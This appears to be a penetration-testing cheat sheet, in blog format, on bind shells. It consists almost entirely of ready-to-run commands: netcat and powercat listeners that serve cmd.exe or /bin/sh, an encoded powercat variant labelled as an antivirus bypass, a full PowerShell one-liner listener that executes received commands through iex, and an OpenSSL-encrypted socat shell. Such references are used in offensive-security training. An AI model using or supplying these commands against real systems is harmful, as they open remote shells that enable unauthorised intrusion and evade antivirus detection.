---
title: Bind Shells
author: Devin Cudnohufsky
date: 2022-01-19 00:00:00 +0500
categories: [Techniques]
tags: [nc, powershell, socat]
---

## Netcat

### Server - Linux

```
nc -nvlp 4444 -e /bin/sh
```

### Server - Windows

```
nc -nlvp 4444 -e cmd.exe
```

### Client

```
nc -nv <server ip> 4444
```

## Powercat

### Server - Windows

#### Standard

```
powercat -l -p 443 -e cmd.exe
```

#### Encoded (AV Bypass)

```
powercat -l -p 443 -e cmd.exe -ge > encodedbindshell.ps1
powershell -E (Get-Content '<path>\encodedbindshell.ps1' -Raw)
```

## Powershell

## Server - Windows

```
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
```

## Socat

### Encrypted

#### Server - Linux

```
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
```

#### Client 

```
socat - OPENSSL:<server ip>:443,verify=0
```
